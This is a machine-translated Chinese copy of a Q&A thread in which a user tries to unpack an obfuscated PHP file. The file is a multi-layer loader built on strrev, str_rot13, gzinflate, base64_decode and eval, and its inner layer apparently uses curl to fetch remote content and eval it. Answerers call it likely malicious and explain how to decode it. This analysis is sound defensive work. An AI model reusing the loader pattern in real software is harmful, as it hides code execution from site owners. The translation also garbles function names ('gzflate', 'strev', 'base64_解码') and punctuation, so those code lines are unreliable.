解码加密的PHP文件_Php_Decode_Encryption

解码加密的PHP文件

php encryption

解码加密的PHP文件,php,decode,encryption,Php,Decode,Encryption,我有一个文件，我正试图解码，但我不知道最好的方式去做它。我尝试过使用一些在线工具，但运气不好……代码如下所示： <?php $zAkSoSavjFOn='jumbledcodeinhere'; $THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir'; $DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr); $WnJYuMUwKmRxBh=str_rot13

我有一个文件，我正试图解码，但我不知道最好的方式去做它。我尝试过使用一些在线工具，但运气不好……代码如下所示：

<?php

$zAkSoSavjFOn='jumbledcodeinhere';

$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';

$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);

$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);

eval($WnJYuMUwKmRxBh);

?>

在我所有的游戏中，我都设法用php脚本提取了以下内容：

eval（gzflate（base64_解码（strev（$zAkSoSavjFOn）））
有人能给我指出这个过程的正确方向吗？任何帮助都将不胜感激。：）
 该“混乱代码”是gzip、base64编码的反向PHP代码，几乎肯定是恶意的
将eval
替换为echo
，看看它能给你带来什么，这就是试图运行的代码。
我不确定这是不是真的加密了-它看起来更像是为了保护版权/知识产权而故意混淆的。如果您无法访问实际的源代码，则很可能您试图解码此代码而违反了法律将eval
替换为echo
返回eval（gzflate（base64_decode（strev（$zAkSoSavjFOn）））代码。啊，我是指那里面的eval
。试试这个：echogzflate（base64_解码（strev（$zAkSoSavjFOn））好的，我明白了。当我这样做时，它会返回以下内容，几乎与第一个块相似<代码>$dXWzuSHlsBFgCJhKbBgV='morejumbledcode'$PUjTLmBUZDuFRJ='；））Itooxuwptsofhyufhmjkq$（ireegf（rqbprq_46rfno）（rgnysavmt（ynir）$Fyfyfzgltraqcnrefsr=strrev（$PUjTLmBUZDuFRJ）；$JmCKTmVJADRViXHTZE=str_rot13（$fyfyfyfzgltraqcnrefsr）；eval（$）
编写此代码的人将竭尽全力隐藏它。只要继续这样做，用echo
替换eval
，直到你得到一个看起来不一样的东西。嗯……有趣的是，它最终让我找到了一个易读的代码，但这都是关于打开/关闭卷曲的。最后一行是这样的：$_SESSION['awcvagcontent']=$content；}else{$content=$\u SESSION['awcvagcontent']}eval（'？>'.base64_decode（$content）。
在我的编辑器中，它告诉我php的最后一行有错误，如果我尝试回显最后一行中找到的eval，我只会得到一个“意外的T_ENCAPSED_和_空格”错误。对我来说，curl选项被隐藏似乎很奇怪……或者我仍然缺少代码的其他部分？